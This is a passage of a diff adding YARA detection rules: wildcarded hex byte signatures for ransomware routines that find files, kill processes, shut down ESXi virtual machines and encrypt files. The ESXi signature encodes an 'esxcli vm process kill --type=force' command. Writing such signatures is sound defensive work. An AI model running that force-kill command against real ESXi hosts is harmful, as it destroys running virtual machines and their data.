+            ?? 89 44 24 ?? 8B 84 24 ?? ?? ?? ?? 89 44 24 ?? 8B 84 24 ?? ?? ?? ?? 89 44 24 ?? 57
+            FF B4 24 ?? ?? ?? ?? 6A ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 39 84 24 ??
+            ?? ?? ?? 0F 84 ?? ?? ?? ?? 83 EC ?? BF ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4
+            ?? E9 ?? ?? ?? ?? 83 EC ?? FF B4 24 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            83 C4 ?? E9
+        }
+		$find_files_v1_p1 = {
+            55 89 C5 57 E8 ?? ?? ?? ?? 81 C7 ?? ?? ?? ?? 56 53 81 EC ?? ?? ?? ?? 89 54 24 ?? 8B
+            B4 24 ?? ?? ?? ?? 89 7C 24 ?? 89 FB 89 4C 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 44 24
+            ?? C7 44 24 ?? ?? ?? ?? ?? 85 C0 74 ?? 8D 58 ?? 80 7C 05 ?? ?? 0F 45 D8 89 5C 24 ??
+            8B BC 24 ?? ?? ?? ?? 83 E7 ?? 74 ?? 83 EC ?? 8D 44 24 ?? 89 44 24 ?? 50 55 6A ?? 8B
+            5C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8B 5C 24 ?? E8 ?? ?? ?? ?? 8B 00 83 F8
+            ?? 0F 85 ?? ?? ?? ?? BF ?? ?? ?? ?? C6 44 24 ?? ?? C7 44 24 ?? ?? ?? ?? ?? EB ?? 8D
+            B4 26 ?? ?? ?? ?? 66 90 83 EC ?? 8D 44 24 ?? 89 44 24 ?? 50 55 6A ?? 8B 5C 24 ?? E8
+            ?? ?? ?? ?? 83 C4 ?? 85 C0 78 ?? 8B 84 24 ?? ?? ?? ?? 25 ?? ?? ?? ?? 3D ?? ?? ?? ??
+            0F 84 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? C6 44 24 ?? ?? 31 FF C7 44 24 ??
+            ?? ?? ?? ?? 8B 54 24 ?? 8B 44 24 ?? F6 84 24 ?? ?? ?? ?? ?? 74 ?? 85 F6 0F 84 ?? ??
+            ?? ?? 8B 4E ?? 8B 5E ?? 31 D1 31 C3 09 CB 0F 84 ?? ?? ?? ?? 31 FF 81 C4 ?? ?? ?? ??
+            89 F8 5B 5E 5F 5D C3 8D 74 26 ?? 90 8B 5C 24 ?? E8 ?? ?? ?? ?? 89 C7 8B 00 83 F8 ??
+            0F 85 ?? ?? ?? ?? 83 EC ?? FF 74 24 ?? 55 6A ?? 8B 5C 24 ?? E8 ?? ?? ?? ?? 83 C4 ??
+            85 C0 0F 85 ?? ?? ?? ?? BF ?? ?? ?? ?? C6 44 24 ?? ?? C7 44 24 ?? ?? ?? ?? ?? E9 ??
+            ?? ?? ?? 8D 74 26 ?? 90 89 54 24 ?? 8B 94 24 ?? ?? ?? ?? 89 44 24 ?? 8B 84 24 ?? ??
+            ?? ?? 89 74 24 ?? 89 44 24 ?? 89 54 24 ?? 85 F6 0F 84 ?? ?? ?? ?? 8B 46 ?? 8B 4C 24
+            ?? 83 C0 ?? 83 C1 ?? 89 44 24 ?? 89 44 24 ?? 8B 46 ?? 89 4C 24 ?? 89 4C 24 ?? 89 44
+        }
+		$find_files_v1_p2 = {
+            24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 83 FF ?? 0F 84 ?? ?? ?? ?? 8B
+            84 24 ?? ?? ?? ?? 83 E0 ?? 89 44 24 ?? 75 ?? 8D 44 24 ?? 50 FF 74 24 ?? FF 74 24 ??
+            55 8B 44 24 ?? FF D0 89 C7 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 85 F6 74 ?? 8B 84 24 ??
+            ?? ?? ?? 8B 5C 24 ?? 89 6C 24 ?? 8B 4C 24 ?? 8B BC 24 ?? ?? ?? ?? 89 C5 EB ?? 8D B6
+            ?? ?? ?? ?? 8B 36 85 F6 74 ?? 8B 46 ?? 8B 56 ?? 31 D8 31 CA 09 C2 75 ?? 8B 46 ?? 8B
+            56 ?? 31 E8 31 FA 09 C2 0F 84 ?? ?? ?? ?? 8B 36 85 F6 75 ?? 8B 6C 24 ?? 8B 7C 24 ??
+            85 FF 74 ?? 80 7C 24 ?? ?? 0F 85 ?? ?? ?? ?? 8B 44 24 ?? C6 44 05 ?? ?? 8B 44 24 ??
+            85 C0 0F 84 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 74 24 ?? FF 74 24 ?? 55 8B 44 24 ?? FF D0
+            83 C4 ?? 89 C7 81 C4 ?? ?? ?? ?? 89 F8 5B 5E 5F 5D C3 66 90 83 EC ?? 6A ?? 55 8B 5C
+            24 ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 89 44 24 ?? 89 C7 E8 ?? ?? ?? ?? 8B 00 89 44 24 ??
+            83 C4 ?? 85 FF 79 ?? 83 F8 ?? 0F B6 4C 24 ?? BA ?? ?? ?? ?? 0F 94 C0 84 C0 B8 ?? ??
+            ?? ?? 0F 44 44 24 ?? 0F 45 CA 89 44 24 ?? 88 4C 24 ?? 8B 44 24 ?? 85 C0 0F 85 ?? ??
+            ?? ?? 83 EC ?? FF 74 24 ?? 8B 5C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8D B4
+            26 ?? ?? ?? ?? 8D 76 ?? 89 54 24 ?? 8B 94 24 ?? ?? ?? ?? 89 44 24 ?? 8B 84 24 ?? ??
+            ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 89 54 24 ?? 8B 44 24 ?? C7 44 24 ?? ?? ??
+            ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 48 ?? 89 4C 24 ?? 89 4C 24 ?? 85 C0 74 ?? 80 7C 05
+            ?? ?? 74 ?? E9 ?? ?? ?? ?? 8D 76 ?? 80 7C 05 ?? ?? 0F 85 ?? ?? ?? ?? 83 E8 ?? 75 ??
+            31 D2 89 54 24 ?? E9 ?? ?? ?? ?? 8D 74 26 ?? 90 89 54 24 ?? 8B 94 24 ?? ?? ?? ?? 89
+        }
+		$find_files_v1_p3 = {
+            44 24 ?? 8B 84 24 ?? ?? ?? ?? 89 74 24 ?? 89 44 24 ?? 89 54 24 ?? E9 ?? ?? ?? ?? 90
+            8B 84 24 ?? ?? ?? ?? BF ?? ?? ?? ?? C6 44 24 ?? ?? 83 E0 ?? 83 F8 ?? 19 C0 83 E0 ??
+            83 C0 ?? 89 44 24 ?? E9 ?? ?? ?? ?? 8D B4 26 ?? ?? ?? ?? 90 8B 74 24 ?? 85 F6 0F 88
+            ?? ?? ?? ?? 83 EC ?? FF 74 24 ?? 8B 5C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 C6 85 C0 0F
+            84 ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B 44 24 ?? 89 44 24 ?? 8D B4 26 ?? ?? ?? ?? 8D 76 ??
+            83 EC ?? 56 8B 5C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 80 78 ?? ??
+            0F 84 ?? ?? ?? ?? 83 EC ?? 8D 78 ?? 57 8B 5C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 3B 44 24
+            ?? 0F 83 ?? ?? ?? ?? 8B 44 24 ?? 83 EC ?? C6 44 05 ?? ?? 57 8B 44 24 ?? 01 E8 50 8B
+            5C 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 5A 5B 8D 48 ?? 8D 44 24 ?? 50 89 E8 FF B4 24 ??
+            ?? ?? ?? 8B 54 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 EC ?? 89 C7
+            56 8B 5C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 66 90 80 78 ?? ?? 0F 84 ?? ??
+            ?? ?? 66 83 78 ?? ?? 0F 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D B6 ?? ?? ?? ?? 80 7C 05 ??
+            ?? 8D 48 ?? 89 C2 0F 84 ?? ?? ?? ?? 85 C9 0F 84 ?? ?? ?? ?? 80 7C 05 ?? ?? 8D 50 ??
+            75 ?? E9 ?? ?? ?? ?? 8D B4 26 ?? ?? ?? ?? 66 90 89 C2 85 D2 0F 84 ?? ?? ?? ?? 80 7C
+            15 ?? ?? 8D 42 ?? 75 ?? E9 ?? ?? ?? ?? 8D B4 26 ?? ?? ?? ?? 85 FF 0F 84 ?? ?? ?? ??
+            31 FF C6 44 24 ?? ?? C7 44 24 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 EC ?? 56 8B 5C 24 ??
+            E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B 07 E9 ?? ?? ?? ?? 8B 7C 24 ?? 89 FB BF ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? C7 00 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? E9 ??
+            ?? ?? ?? BF
+        }
+		$kill_processes_v1_p1 = {
+            55 BA ?? ?? ?? ?? B8 ?? ?? ?? ?? BD ?? ?? ?? ?? 57 89 E9 56 53 E8 ?? ?? ?? ?? 81 C3
+            ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 66 89 54 24 ?? 8D 7C 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7
+            44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D B3 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
+            ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C6 44 24
+            ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44
+            24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C6 44 24 ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7
+            44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 66 89 44 24 ??
+            C6 44 24 ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
+            ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C6 44 24 ?? ?? 8B 83 ?? ?? ?? ??
+            89 44 24 ?? 8B 83 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? F3 A5 8D B4 24 ?? ?? ?? ?? C6 44
+        }
+		$kill_processes_v1_p2 = {
+            24 ?? ?? 83 EC ?? C7 44 24 ?? ?? ?? ?? ?? 89 F7 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ??
+            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 CD C7 44 24 ?? ?? ??
+            ?? ?? B9 ?? ?? ?? ?? 89 E8 F3 AB FF B4 24 ?? ?? ?? ?? 89 F7 8D 44 24 ?? 50 56 E8 ??
+            ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? 83 C4 ?? 89 E8 B9 ?? ?? ?? ?? F3 AB FF B4 24 ?? ??
+            ?? ?? 89 F7 8D 44 24 ?? 50 56 E8 ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? 83 C4 ?? 89 E8
+            B9 ?? ?? ?? ?? F3 AB FF B4 24 ?? ?? ?? ?? 89 F7 8D 44 24 ?? 50 56 E8 ?? ?? ?? ?? 89
+            34 24 E8 ?? ?? ?? ?? 83 C4 ?? 89 E8 B9 ?? ?? ?? ?? F3 AB FF B4 24 ?? ?? ?? ?? 89 F7
+            8D 44 24 ?? 50 56 E8 ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? 83 C4 ?? 89 E8 B9 ?? ?? ??
+            ?? F3 AB FF B4 24 ?? ?? ?? ?? 89 F7 8D 84 24 ?? ?? ?? ?? 50 56 E8 ?? ?? ?? ?? 89 34
+            24 E8 ?? ?? ?? ?? 83 C4 ?? 89 E8 B9 ?? ?? ?? ?? F3 AB FF B4 24 ?? ?? ?? ?? 89 F7 8D
+            44 24 ?? 50 56 E8 ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? 83 C4 ?? 89 E8 B9 ?? ?? ?? ??
+            F3 AB FF B4 24 ?? ?? ?? ?? 8D 44 24 ?? 50 56 E8 ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ??
+            81 C4 ?? ?? ?? ?? 5B 5E 5F 5D C3
+        }
+		$shut_down_esxi_v1 = {
+            55 B8 ?? ?? ?? ?? BD ?? ?? ?? ?? 57 89 C1 56 53 E8 ?? ?? ?? ?? 81 C3 ?? ?? ?? ?? 81
+            EC ?? ?? ?? ?? 8D 7C 24 ?? C7 44 24 ?? 65 73 78 63 C7 44 24 ?? 6C 69 20 76 C7 44 24
+            ?? 6D 20 70 72 8D B3 ?? ?? ?? ?? C7 44 24 ?? 6F 63 65 73 F3 A5 8D B4 24 ?? ?? ?? ??
+            C7 44 24 ?? 73 20 6B 69 83 EC ?? 89 F7 C7 44 24 ?? 6C 6C 20 2D C7 44 24 ?? 2D 74 79
+            70 C7 44 24 ?? 65 3D 66 6F C7 44 24 ?? 72 63 65 20 C7 44 24 ?? 2D 2D 77 6F 89 C8 B9
+            ?? ?? ?? ?? C7 44 24 ?? 72 6C 64 2D C7 44 24 ?? 69 64 3D 22 C7 84 24 ?? ?? ?? ?? 25
+            73 22 00 C7 44 24 ?? 5B 45 53 58 C7 44 24 ?? 69 5D 20 53 C7 44 24 ?? 68 75 74 74 C7
+            44 24 ?? 69 6E 67 20 C7 44 24 ?? 64 6F 77 6E F3 AB C7 44 24 ?? 20 2D 20 25 8D 83 ??
+            ?? ?? ?? 66 89 6C 24 ?? C6 44 24 ?? ?? 50 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83
+            C4 ?? 85 C0 0F 84 ?? ?? ?? ?? BF ?? ?? ?? ?? 89 C5 8D 44 24 ?? 66 89 7C 24 ?? 31 FF
+        }
+		$kill_processes_v2_p1 = {
+            41 54 BA ?? ?? ?? ?? B9 ?? ?? ?? ?? 45 31 E4 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 55 48 89
+            FD 53 48 81 EC ?? ?? ?? ?? 66 0F 6F 05 ?? ?? 00 00 48 89 84 24 ?? ?? ?? ?? B8 ?? ??
+            ?? ?? 48 8D 9C 24 ?? ?? ?? ?? 48 8D B4 24 ?? ?? ?? ?? 0F 29 84 24 ?? ?? ?? ?? 66 0F
+            6F 05 ?? ?? 00 00 48 89 DF 66 89 44 24 ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 0F 29 44 24
+            ?? 66 0F 6F 05 ?? ?? 00 00 66 89 54 24 ?? 48 89 EA 0F 29 44 24 ?? 66 0F 6F 05 ?? ??
+            00 00 66 89 8C 24 ?? ?? 00 00 B9 ?? ?? ?? ?? 0F 29 44 24 ?? 66 0F 6F 05 ?? ?? 00 00
+            C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 0F 29 84 24 ?? ?? ?? ?? 66 0F 6F 05 ?? ?? 00 00 C6
+            84 24 ?? ?? ?? ?? ?? 0F 29 84 24 ?? ?? ?? ?? 66 0F 6F 05 ?? ?? 00 00 C7 44 24 ?? ??
+            ?? ?? ?? 0F 29 84 24 ?? ?? ?? ?? 66 0F 6F 05 ?? ?? 00 00 C6 44 24 ?? ?? 0F 29 84 24
+            ?? ?? ?? ?? C6 44 24 ?? ?? C7 44 24 ?? ?? ?? ?? ?? C6 44 24 ?? ?? C7 84 24 ?? ?? ??
+            ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 48 89 44 24 ?? 48 B8
+        }
+		$kill_processes_v2_p2 = {
+            48 89 44 24 ?? 4C 89 E0 F3 48 AB 48 89 DF C6 44 24 ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7
+            44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 4C 89 E0 48 89 DF B9 ??
+            ?? ?? ?? F3 48 AB 48 8D 74 24 ?? 48 89 EA 48 89 DF E8 ?? ?? ?? ?? 48 89 DF E8 ?? ??
+            ?? ?? 4C 89 E0 48 89 DF B9 ?? ?? ?? ?? F3 48 AB 48 8D 74 24 ?? 48 89 EA 48 89 DF E8
+            ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 4C 89 E0 48 89 DF B9 ?? ?? ?? ?? F3 48 AB 48 8D
+            74 24 ?? 48 89 EA 48 89 DF E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 4C 89 E0 48 89 DF
+            B9 ?? ?? ?? ?? F3 48 AB 48 8D B4 24 ?? ?? ?? ?? 48 89 EA 48 89 DF E8 ?? ?? ?? ?? 48
+            89 DF E8 ?? ?? ?? ?? 4C 89 E0 48 89 DF B9 ?? ?? ?? ?? F3 48 AB 48 8D 74 24 ?? 48 89
+            EA 48 89 DF E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 4C 89 E0 48 89 DF B9 ?? ?? ?? ??
+            F3 48 AB 48 8D 74 24 ?? 48 89 EA 48 89 DF E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48
+            81 C4 ?? ?? ?? ?? 5B 5D 41 5C C3
+        }
+		$encrypt_files_v2_p1 = {
+            48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 41 57 66 0F EF C0 49 89 FF 41 56 49 89 D6 41 55 49 89
+            F5 BE ?? ?? ?? ?? 41 54 55 53 48 81 EC ?? ?? ?? ?? 48 8D 5C 24 ?? 48 89 4C 24 ?? 48
+            8D AC 24 ?? ?? ?? ?? 48 89 DF 4C 89 04 24 0F 29 44 24 ?? 0F 29 44 24 ?? 0F 29 44 24
+            ?? 48 C7 44 24 ?? ?? ?? ?? ?? 0F 29 44 24 ?? 48 89 44 24 ?? E8 ?? ?? ?? ?? 85 C0 75
+            ?? 45 31 E4 48 89 EF BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 DF BE ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 48 8D 7B ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 44 89 E0 5B 5D
+            41 5C 41 5D 41 5E 41 5F C3 0F 1F 80 ?? ?? ?? ?? 48 8D 7B ?? BE ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 85 C0 74 ?? BA ?? ?? ?? ?? 48 89 DE 48 89 EF E8 ?? ?? ?? ?? 48 8D 35 ?? ?? ??
+            ?? 4C 89 FF E8 ?? ?? ?? ?? 48 89 44 24 ?? 48 85 C0 0F 84 ?? ?? ?? ?? 4C 89 FF E8 ??
+            ?? ?? ?? 4C 89 FE 4C 89 EF 48 89 C2 49 89 C4 E8 ?? ?? ?? ?? 8B 54 24 ?? 4B 8D 44 25
+            ?? 31 F6 89 10 0F B7 54 24 ?? 66 89 50 ?? 0F B6 54 24 ?? 88 50 ?? BA ?? ?? ?? ?? 43
+            C6 44 25 ?? ?? 4C 8B 64 24 ?? 4C 89 E7 E8 ?? ?? ?? ?? 4C 89 E7 4C 89 64 24 ?? 45 31
+            E4 E8 ?? ?? ?? ?? 48 83 F8 ?? 7E ?? 4C 89 EE 4C 89 FF E8 ?? ?? ?? ?? 85 C0 74 ?? 48
+            8B 7C 24 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 66 0F 1F 44 00 ?? 48 8B 7C 24 ?? E8 ?? ??
+            ?? ?? 48 8D 35 ?? ?? ?? ?? 4C 89 EF E8 ?? ?? ?? ?? 48 89 44 24 ?? 49 89 C4 48 85 C0
+        }
+		$encrypt_files_v2_p2 = {
+            0F 84 ?? ?? ?? ?? 31 F6 BA ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E7 4C 89 64 24
+            ?? E8 ?? ?? ?? ?? 48 39 44 24 ?? 48 0F 4E 44 24 ?? 48 8D 7C 24 ?? 48 89 C1 48 C1 F9
+            ?? 48 C1 E9 ?? 48 8D 14 08 83 E2 ?? 48 29 CA 48 29 D0 48 89 44 24 ?? E8 ?? ?? ?? ??
+            48 8D BC 24 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 89 DE 48 89 44 24 ?? 31 C0 BA ?? ?? ?? ??
+            F3 48 AB 48 8D 84 24 ?? ?? ?? ?? 48 8B 3C 24 48 89 C1 48 89 44 24 ?? E8 ?? ?? ?? ??
+            41 89 C4 85 C0 0F 84 ?? ?? ?? ?? 48 8B 7C 24 ?? E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 4C 89
+            EE E8 ?? ?? ?? ?? 41 89 C4 85 C0 0F 84 ?? ?? ?? ?? 48 8B 44 24 ?? 4C 8D 64 24 ?? 48
+            85 C0 75 ?? E9 ?? ?? ?? ?? 0F 1F 80 ?? ?? ?? ?? 4D 89 F1 4D 89 E8 4C 89 E9 4C 89 E2
+            48 89 EE 48 8D 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 F6 BA ?? ?? ?? ?? 4C 89 FF 48 F7
+            DE E8 ?? ?? ?? ?? 4C 89 F9 4C 89 F2 BE ?? ?? ?? ?? 4C 89 EF E8 ?? ?? ?? ?? 48 8B 44
+            24 ?? 4C 29 F0 48 89 44 24 ?? 74 ?? 49 39 C6 4C 8B 7C 24 ?? BE ?? ?? ?? ?? 4C 89 EF
+            4C 0F 47 F0 66 0F 6F 4C 24 ?? 4C 89 F9 4C 89 F2 0F 29 4C 24 ?? E8 ?? ?? ?? ?? 4C 39
+            F0 74 ?? 48 8B 7C 24 ?? 41 BC ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 4C 89 FE 4C
+            89 EF E8 ?? ?? ?? ?? E9
+        }
+		$find_files_v2_p1 = {
+            41 57 4D 89 C7 41 56 49 89 FE 41 55 49 89 FD 41 54 55 53 89 CB 48 81 EC ?? ?? ?? ??
+            48 89 34 24 89 54 24 ?? 41 8B 55 ?? 49 83 C5 ?? 8D 82 ?? ?? ?? ?? F7 D2 21 D0 25 ??
+            ?? ?? ?? 74 ?? 89 C2 C1 EA ?? A9 ?? ?? ?? ?? 0F 44 C2 49 8D 55 ?? 4C 0F 44 EA 89 C6
+            40 00 C6 49 83 DD ?? 31 ED 4D 29 F5 74 ?? 49 8D 6D ?? 43 80 7C 2E ?? ?? 49 0F 45 ED
+            48 8D 44 24 ?? 41 89 DC 4C 89 F6 48 89 44 24 ?? 48 89 C2 BF ?? ?? ?? ?? 41 83 E4 ??
+            0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 00 83 F8
+            ?? 0F 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 45 31 DB 41 BC ?? ?? ?? ?? 48 8B 44 24 ?? F6 C3
+            ?? 0F 85 ?? ?? ?? ?? 48 89 44 24 ?? 48 8B 44 24 ?? 4C 89 7C 24 ?? 48 89 44 24 ?? 4D
+            85 FF 0F 84 ?? ?? ?? ?? 41 8B 47 ?? 8D 55 ?? 89 54 24 ?? 83 C0 ?? 89 44 24 ?? 89 44
+            24 ?? 41 8B 47 ?? 89 44 24 ?? 45 31 C0 C7 44 24 ?? ?? ?? ?? ?? 83 F9 ?? 0F 84 ?? ??
+            ?? ?? 89 D8 83 E0 ?? 89 44 24 ?? 75 ?? 44 88 5C 24 ?? 44 89 E2 48 8D 4C 24 ?? 4C 89
+            F7 48 8B 74 24 ?? 48 8B 04 24 44 89 44 24 ?? FF D0 44 8B 44 24 ?? 44 0F B6 5C 24 ??
+            85 C0 89 C2 75 ?? 4D 85 FF 0F 84 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 54 24 ?? EB ?? 0F
+            1F 44 00 ?? 4D 8B 3F 4D 85 FF 0F 84 ?? ?? ?? ?? 49 39 47 ?? 75 ?? 49 39 57 ?? 75 ??
+            31 D2 48 81 C4 ?? ?? ?? ?? 89 D0 5B 5D 41 5C 41 5D 41 5E 41 5F C3 66 90 E8 ?? ?? ??
+            ?? 85 C0 78 ?? 8B 44 24 ?? 25 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 3D ?? ??
+            ?? ?? 0F 84 ?? ?? ?? ?? 31 C9 45 31 DB 45 31 E4 48 8B 44 24 ?? F6 C3 ?? 0F 84 ?? ??
+            ?? ?? 4D 85 FF 0F 84 ?? ?? ?? ?? 49 39 47 ?? 75 ?? 48 89 44 24 ?? 48 8B 44 24 ?? 4C
+        }
+		$find_files_v2_p2 = {
+            89 7C 24 ?? 48 89 44 24 ?? E9 ?? ?? ?? ?? 66 2E 0F 1F 84 00 ?? ?? 00 00 E8 ?? ?? ??
+            ?? 49 89 C4 8B 00 83 F8 ?? 0F 85 ?? ?? ?? ?? 48 8B 54 24 ?? 4C 89 F6 BF ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 45 31 DB 41 BC ?? ?? ?? ?? EB
+            ?? 0F 1F 00 8B 4C 24 ?? 85 C9 74 ?? 45 84 DB 0F 85 ?? ?? ?? ?? 8B 44 24 ?? 43 C6 04
+            2E ?? 85 C0 0F 84 ?? ?? ?? ?? 44 89 E2 48 8D 4C 24 ?? 48 8B 74 24 ?? 4C 89 F7 48 8B
+            04 24 FF D0 89 C2 E9 ?? ?? ?? ?? 90 31 F6 4C 89 F7 31 C0 44 88 5C 24 ?? E8 ?? ?? ??
+            ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 7C 24 ?? 44 0F B6 5C 24 ?? 44 8B 00 85 FF 79 ?? 41
+            83 F8 ?? BA ?? ?? ?? ?? 0F 94 C0 84 C0 B8 ?? ?? ?? ?? 44 0F 45 DA 44 0F 45 E0 8B 74
+            24 ?? 85 F6 0F 85 ?? ?? ?? ?? 8B 7C 24 ?? 44 88 5C 24 ?? 44 89 44 24 ?? E8 ?? ?? ??
+            ?? 44 0F B6 5C 24 ?? 44 8B 44 24 ?? E9 ?? ?? ?? ?? 0F 1F 00 48 89 44 24 ?? 48 8B 44
+            24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 89 44 24 ?? 8D 45 ?? C7 44 24 ?? ?? ?? ?? ?? 89
+            44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 48 85 ED 74 ?? 41 80 3C 2E ?? 48 89 E8 74 ?? E9 ??
+            ?? ?? ?? 0F 1F 44 00 ?? 41 80 3C 06 ?? 0F 85 ?? ?? ?? ?? 48 83 E8 ?? 75 ?? 31 D2 89
+        }
+		$find_files_v2_p3 = {
+            54 24 ?? E9 ?? ?? ?? ?? 0F 1F 40 ?? 89 D8 B9 ?? ?? ?? ?? 41 BB ?? ?? ?? ?? 83 E0 ??
+            83 F8 ?? 45 19 E4 41 83 E4 ?? 41 83 C4 ?? E9 ?? ?? ?? ?? 0F 1F 44 00 ?? 8B 54 24 ??
+            85 D2 0F 88 ?? ?? ?? ?? 8B 7C 24 ?? E8 ?? ?? ?? ?? 49 89 C7 48 85 C0 0F 84 ?? ?? ??
+            ?? B8 ?? ?? ?? ?? 44 89 64 24 ?? 4C 29 E8 48 89 44 24 ?? 48 8D 44 24 ?? 48 89 44 24
+            ?? 8B 44 24 ?? 83 E8 ?? 89 44 24 ?? 4C 89 FF E8 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ??
+            ?? 80 78 ?? ?? 74 ?? 4C 8D 60 ?? 4C 89 E7 E8 ?? ?? ?? ?? 48 3B 44 24 ?? 0F 83 ?? ??
+            ?? ?? 41 C6 04 2E ?? 49 8D 7C 2E ?? 4C 89 E6 E8 ?? ?? ?? ?? 4C 8B 44 24 ?? 8B 54 24
+            ?? 89 D9 48 8B 34 24 4C 89 F7 E8 ?? ?? ?? ?? 85 C0 74 ?? 4C 89 FF 89 04 24 E8 ?? ??
+            ?? ?? 8B 14 24 E9 ?? ?? ?? ?? 66 90 80 78 ?? ?? 74 ?? 66 83 78 ?? ?? 75 ?? EB ?? 90
+            41 80 7C 06 ?? ?? 48 8D 70 ?? 89 C2 0F 84 ?? ?? ?? ?? 48 85 F6 0F 84 ?? ?? ?? ?? 41
+            80 7C 06 ?? ?? 48 8D 50 ?? 75 ?? E9 ?? ?? ?? ?? 0F 1F 40 ?? 48 89 C2 48 85 D2 0F 84
+            ?? ?? ?? ?? 41 80 7C 16 ?? ?? 48 8D 42 ?? 75 ?? E9 ?? ?? ?? ?? 0F 1F 00 45 85 E4 0F
+            84 ?? ?? ?? ?? 31 C9 45 31 DB 41 BC ?? ?? ?? ?? E9 ?? ?? ?? ?? 4C 89 FF 44 8B 64 24
+            ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 41 8B 04 24 E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 FF
+            C7 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? E9 ?? ?? ?? ?? BA ?? ?? ?? ?? E9 ??
+            ?? ?? ?? 48 89 F2 E9 ?? ?? ?? ?? 44 89 04 24 E8 ?? ?? ?? ?? 44 8B 04 24 BA ?? ?? ??
